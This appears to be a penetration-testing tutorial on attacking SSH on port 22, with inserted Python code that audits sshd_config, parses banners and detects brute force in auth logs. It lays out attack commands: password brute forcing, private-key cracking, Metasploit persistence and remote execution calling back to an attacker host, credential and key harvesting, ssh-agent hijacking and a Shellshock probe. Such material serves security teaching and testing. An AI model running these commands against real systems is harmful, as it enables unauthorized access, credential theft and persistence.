SSH Penetration Testing Fundamentals
Posted in: Network Penetration Testing


Welcome, today I am writing about SSH penetration testing fundamentals and the vulnerabilities commonly found on port 22. SSH security is a topic we all need to understand: remote access services can be an entry point for malicious actors when they are configured improperly.

Understand SSH Protocol

Explaining how SSH works is out of scope here; I assume you are already familiar with the service and with how it can be configured on a Linux host.

Some things to remember: SSH listens on port 22 by default and uses a client-server architecture to access remote hosts securely.

SSH supports several authentication methods, and each of them has its own security weaknesses, so keep that in mind! One of the most used methods is authentication with RSA keys built on a PKI infrastructure. Another great feature is the ability to create encrypted tunnels between machines or to forward ports to local or remote services; as pentesters we can use this to pivot inside the network under the radar, since SSH is a well-known tool to sysadmins.

Read more about Pivoting using SSH

Managing SSH Service

Verify SSH Server Status

systemctl status ssh

Start SSH Service

systemctl start ssh

Stop SSH Service

systemctl stop ssh

Restart SSH Service

systemctl restart ssh

Define SSH server to start on boot

systemctl enable ssh

SSH Interesting Files

SSH has some files that need to be checked; all of them contain something we can leverage to escalate our attack or to help us move around.

Client Config

The SSH client configuration file can be used to automate settings or to jump between machines. Take some time and check the file:

vi /etc/ssh/ssh_config

Server Config

The SSH server configuration is stored in the following file; after compromising the machine you can control how the server works.

vi /etc/ssh/sshd_config

Recommendation: activating the tunnel settings and agent forwarding in this file helps you with lateral movement.
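A defender's counterpart to that recommendation: an added example (not from the original post) that reads sshd_config the way sshd does and reports which of the settings mentioned here (root login, password authentication, port forwarding, agent forwarding, tunnels) are in their risky state, whether set explicitly or left at the default. The config excerpt is constructed, and the defaults assumed are those of OpenSSH 7.x and later.

```python
import re

# Constructed sshd_config excerpt. sshd keeps the FIRST value it reads for a
# keyword (the second PasswordAuthentication line is therefore ignored), and
# anything after a Match block applies only to the connections it matches.
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
#PasswordAuthentication no
PasswordAuthentication yes
PasswordAuthentication no
AllowAgentForwarding yes
Match User rfs
    AllowTcpForwarding no
"""

# Assumed OpenSSH defaults (7.x and later) and the values that widen exposure
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
            "allowtcpforwarding": "yes", "allowagentforwarding": "yes", "permittunnel": "no"}
RISKY = {"permitrootlogin": {"yes"}, "passwordauthentication": {"yes"},
         "allowtcpforwarding": {"yes", "all"}, "allowagentforwarding": {"yes"},
         "permittunnel": {"yes", "point-to-point", "ethernet"}}

def parse_global_sshd_config(text):
    """Effective global value per keyword: first occurrence wins, stop at Match."""
    effective = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank line or comment
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # 'Key value' or 'Key=value'
        key = parts[0].lower()            # keywords are case-insensitive
        if key == "match":
            break                         # the rest is conditional, not global
        effective.setdefault(key, parts[1] if len(parts) > 1 else "")
    return effective

def audit_sshd_config(text):
    """Return {keyword: value} for every risky setting, explicit or defaulted."""
    cfg = parse_global_sshd_config(text)
    findings = {}
    for key, bad in RISKY.items():
        value = cfg.get(key, DEFAULTS[key]).lower()
        if value in bad:
            findings[key] = value
    return findings

if __name__ == "__main__":
    print(audit_sshd_config(SAMPLE_SSHD_CONFIG))
```

Note that AllowTcpForwarding is reported as risky here because its default is "yes" and the only "no" in the sample sits inside a Match block.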

Authorized Keys

The authorized_keys file holds the SSH public keys authorized to authenticate to the machine. Each user can have their own file.

vi ~/.ssh/authorized_keys

Known Hosts

cat /home/rfs/.ssh/known_hosts

RSA Keys

Default folder containing the user's keys:

cd ~/.ssh
cd /home/rfs/.ssh

Attack SSH port 22

SSH Penetration Testing

OK, let's talk about how to pentest SSH. As you know, it all starts with enumeration; we can use some tools to do all the work for us, or we can do it manually.

Some questions to ask before we start enumerating:

  • Is there any SSH server running?
  • On what Port?
  • What version is running?
  • Any Exploit to that version?
  • What authentication type is used? Passwords / RSA Keys
  • Is it blocking brute force?

After we have all the answers we can start thinking about what to do. If we don't have any information about users or passwords/keys yet, it is better to search for an exploit; unfortunately SSH exploits are rare, so search my website for any available exploits.

Damn it, we are stuck :/

It's time to enumerate other services and try to find something that can be used, like usernames or RSA keys; remember that keys usually have the username at the end (the comment field).

Assuming we found one or more usernames, we can try to brute-force the service using a good wordlist, or, if we were lucky and found an RSA key with a username, we are in!

Haha is not so easy, but OK, we are learning…

SSH Enumeration

After we scan a network and identify port 22 open on a remote host, we need to identify which SSH service is running and its version; for that we can use Nmap.

nmap -sV -p22 192.168.1.96

SSH Banner Grabber

Banner grabbing is an easy technique, but it can help us a lot: we can see which service version is running on the remote server and try to find a CVE related to it.

nc 192.168.1.96 22
SSH Banner
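As an added example (not from the original post), a parser for the identification string that the nc command returns, which also answers the "what version is running?" question by comparing an OpenSSH banner against a threshold such as the "OpenSSH <7.4" entry later in this post. The sample banner is constructed from the version this post reports for its target, and grab_banner is a helper assumed here.

```python
import re
import socket

# Constructed sample, matching the version the post reports for its target
SAMPLE_BANNER = "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n"

# RFC 4253 identification string: SSH-protoversion-softwareversion [SP comments]
_BANNER_RE = re.compile(r"^SSH-(?P<proto>[^-]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")

def parse_banner(banner):
    """Split an SSH identification string into protocol, software and comments;
    for OpenSSH also extract (major, minor) so versions can be compared."""
    m = _BANNER_RE.match(banner.strip())
    if not m:
        raise ValueError(f"not an SSH identification string: {banner!r}")
    info = m.groupdict()
    ver = re.match(r"OpenSSH_(\d+)\.(\d+)", info["software"])  # e.g. OpenSSH_4.7p1
    info["openssh_version"] = (int(ver[1]), int(ver[2])) if ver else None
    return info

def openssh_older_than(banner, major, minor):
    """True when the banner is OpenSSH and its version is below major.minor."""
    v = parse_banner(banner)["openssh_version"]
    return v is not None and v < (major, minor)

def grab_banner(host, port=22, timeout=5.0):
    """Assumed helper: read the identification line, as `nc host 22` shows it.
    Servers may send other lines first, so skip until one starts with 'SSH-'."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        reader = s.makefile("r", encoding="ascii", errors="replace")
        for line in reader:
            if line.startswith("SSH-"):
                return line
    raise ValueError("server sent no SSH identification string")

if __name__ == "__main__":
    print(parse_banner(SAMPLE_BANNER))
    print("older than 7.4:", openssh_older_than(SAMPLE_BANNER, 7, 4))
```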

If we connect using the verbose parameter we can see all the information needed to authenticate to the remote server.

ssh -v 192.168.1.96
SSH Servers List

  • Dropbear Server
  • OpenSSH Server
  • wolfSSH Server
  • CopSSH Server
  • Cisco SSH Server
  • IBM SSH

Detect SSH Authentication Type

ssh -v 192.168.1.96
SSH authentication types

Attack SSH port 22

At this point we only know which service is running on port 22 and its version (OpenSSH_4.7p1 Debian-8ubuntu1). Assuming we have found the username msfadmin, we will try to brute-force his password using hydra.

Bruteforce SSH Service

hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -u user -p passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run
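The flip side of the "is it blocking brute force?" question: an added example (not part of the original post) that scans sshd auth.log lines for the kind of password-guessing run the hydra command above produces, grouping failures per source address inside a sliding window and noting whether the run ended in a successful login. The log excerpt is constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt: a guessing run from one address that ends in a
# successful password login, plus unrelated traffic from a second address.
SAMPLE_AUTH_LOG = """\
Jan 10 10:15:01 target sshd[1234]: Failed password for msfadmin from 192.168.1.107 port 51234 ssh2
Jan 10 10:15:02 target sshd[1235]: Failed password for invalid user admin from 192.168.1.107 port 51236 ssh2
Jan 10 10:15:03 target sshd[1236]: Failed password for msfadmin from 192.168.1.107 port 51238 ssh2
Jan 10 10:15:04 target sshd[1237]: Failed password for msfadmin from 192.168.1.107 port 51240 ssh2
Jan 10 10:15:05 target sshd[1238]: Failed password for msfadmin from 192.168.1.107 port 51242 ssh2
Jan 10 10:15:06 target sshd[1239]: Accepted password for msfadmin from 192.168.1.107 port 51244 ssh2
Jan 10 10:20:00 target sshd[1300]: Accepted publickey for rfs from 192.168.1.50 port 40000 ssh2
Jan 10 10:21:00 target sshd[1301]: Failed password for rfs from 192.168.1.50 port 40002 ssh2
"""

# One sshd auth line; "invalid user" marks a name that does not exist locally
_LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: {"failures", "users", "success_after"}} for every source
    with at least `threshold` failed logins inside a sliding `window`."""
    events = []
    for line in log_text.splitlines():
        m = _LINE_RE.match(line)
        if m:   # syslog timestamps carry no year; 1900 is fine for deltas
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events.append((ts, m["ip"], m["result"], m["user"]))
    events.sort()
    recent = defaultdict(list)   # ip -> [(ts, user)] of failures still in window
    alerts = {}
    for ts, ip, result, user in events:
        if result == "Failed":
            recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
            recent[ip].append((ts, user))
            if len(recent[ip]) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": [], "success_after": None})
                a["failures"] = len(recent[ip])
                a["users"] = sorted({u for _, u in recent[ip]})
        elif ip in alerts and alerts[ip]["success_after"] is None:
            alerts[ip]["success_after"] = user   # the guessing run ended in a login
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_AUTH_LOG))
```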

Crack SSH Private Keys

ssh2john id_rsa.priv > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

Default Credentials

https://github.com/PopLabSec/SSH-default-Credentials

SSH Bad Keys

Some embedded devices have static SSH keys, you can find a collection of keys here:

https://github.com/poplabdev/ssh-badkeys

SSH Exploits

Version: OpenSSH <7.4
Exploit: SSH Exploits

LibSSH RCE

CVE-2018-10933

Post Exploitation

Persistence

msf > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) > exploit

SSH User Code Execution

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set rhosts 192.168.1.103
msf exploit(sshexec) > set username rfs
msf exploit(sshexec) > set password poplabsec
msf exploit(sshexec) > set srvhost 192.168.1.107
msf exploit(sshexec) > exploit

Lateral Movement

Steal SSH credentials

If we have a Meterpreter shell we can use the post-exploitation module post/multi/gather/ssh_creds to try to collect all SSH credentials on the machine.

msf > use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit

Search SSH Keys files

find / -name "*id_rsa*" 2>/dev/null

Search SSH Key files inside file content

# Match on the PEM header instead of the file name, skipping pseudo-filesystems
grep -rl --exclude-dir=proc --exclude-dir=sys "PRIVATE KEY" / 2>/dev/null

SSH Hijacking

Find the SSHd process

ps aux | grep sshd
# Attacker looks for SSH_AUTH_SOCK in the victim's environment variables
# (environ is NUL-separated, so split it into lines before grepping)
tr '\0' '\n' < /proc/<pid>/environ | grep SSH_AUTH_SOCK

The attacker hijacks the victim's ssh-agent socket

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l

An attacker can log in to remote systems as the victim

ssh 192.168.1.107 -l victim

SSH and ShellShock

LC_X='() { :; }; echo vulnerable' ssh rfs@poplabsec.com -o SendEnv=LC_X

SSH Tunnels

Working with RSA Keys

SSH Hacking Tools

sshaudit

SSH-KeyGrab

CrackMapExec

Is port 22 secure?

Yes, it is one of the most secure services.

Should port 22 be open?

Port 22 should only be open if you need to access your machine remotely.
